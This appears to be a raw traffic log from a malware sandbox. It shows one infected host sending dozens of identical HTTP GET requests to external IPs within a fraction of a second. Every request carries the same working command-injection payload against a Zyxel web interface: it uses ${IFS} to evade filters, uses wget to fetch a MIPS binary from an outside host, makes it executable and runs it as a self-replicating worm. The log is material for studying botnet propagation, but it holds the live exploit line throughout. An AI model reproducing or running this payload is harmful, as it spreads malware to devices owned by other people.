                                            Feb 2, 2024 06:21:32.029042006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9417192.168.2.1543806185.12.34.236443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.029114008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9418192.168.2.1549542160.65.56.232443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.029146910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9419192.168.2.1552098154.207.104.251443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.029184103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9420192.168.2.1540506174.21.19.87443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.029244900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9421192.168.2.153429839.232.218.255443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.029282093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9422192.168.2.1560942115.64.164.0443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.029320002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9423192.168.2.156071868.245.198.250443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.029351950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9424192.168.2.155636881.190.102.119443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.029398918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9425192.168.2.1537634199.52.82.59443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.029442072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9426192.168.2.1552438183.37.224.155443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.029494047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9427192.168.2.1540150196.172.27.83443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.029531002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9428192.168.2.153366486.209.77.251443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.029553890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9429192.168.2.1554772204.88.136.246443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.029601097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9430192.168.2.1542938157.50.73.116443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.029653072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9431192.168.2.1538724168.252.134.80443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.029691935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9432192.168.2.1535704123.127.163.166443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.029700994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9433192.168.2.1538966145.71.221.208443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.029747963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9434192.168.2.154251818.123.93.43443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.029778004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9435192.168.2.155120892.107.108.45443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.029850006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9436192.168.2.1558450176.231.208.159443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.029901028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9437192.168.2.1540264182.249.123.110443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.029917955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9438192.168.2.1547282198.45.158.115443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.029977083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9439192.168.2.154906278.5.206.71443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.030014038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9440192.168.2.15477745.108.8.231443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.030036926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9441192.168.2.15604801.68.59.232443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.030086040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9442192.168.2.1540010176.155.155.20443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.030113935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9443192.168.2.154440289.67.247.0443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.030145884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9444192.168.2.1534324129.136.164.49443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.030194044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9445192.168.2.154638277.170.8.197443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.030229092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9446192.168.2.1555016138.11.131.250443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.030277014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9447192.168.2.1535300159.181.103.32443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.030313015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9448192.168.2.153998237.45.73.199443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.030328035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9449192.168.2.1542478168.140.60.66443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.030390978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9450192.168.2.1544388172.160.115.160443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.030421972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9451192.168.2.154313469.8.195.8443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.030478001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9452192.168.2.1544636114.32.77.62443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.030493975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9453192.168.2.153532412.24.161.94443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.030519962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9454192.168.2.154919460.30.57.73443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.030584097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9455192.168.2.1534336198.93.80.38443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.030612946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9456192.168.2.1553200160.225.136.195443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.030668974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9457192.168.2.1546986145.7.96.11443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.030704975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9458192.168.2.156042449.19.131.147443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.030745983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9459192.168.2.1535710174.76.204.125443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.030776978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9460192.168.2.1558902116.150.119.242443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.030834913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9461192.168.2.154270291.143.123.71443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.030875921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9462192.168.2.1550550222.93.153.64443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.030915022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9463192.168.2.1554028157.223.112.235443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.030953884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9464192.168.2.1534998129.48.94.223443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.031008005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9465192.168.2.1557330207.166.108.187443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.031044960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9466192.168.2.1542662144.40.127.242443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.031079054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9467192.168.2.1543178219.98.111.67443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.031104088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9468192.168.2.155825866.180.212.191443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.031161070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9469192.168.2.1537920151.117.25.202443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.031173944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9470192.168.2.153511883.24.165.52443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.031224012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9471192.168.2.1545444103.13.191.87443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.031276941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9472192.168.2.1553562115.75.117.178443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.031331062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9473192.168.2.1546026136.13.18.241443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.031374931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9474192.168.2.155601461.217.5.244443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.031411886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9475192.168.2.153950046.75.45.55443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.031470060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9476192.168.2.153918474.100.226.233443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.031503916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9477192.168.2.155834271.131.92.88443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.031534910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9478192.168.2.1537576166.191.57.208443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.031563044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9479192.168.2.1558766194.7.87.108443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.031590939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9480192.168.2.155483860.180.249.81443
                                            TimestampBytes transferredDirectionData
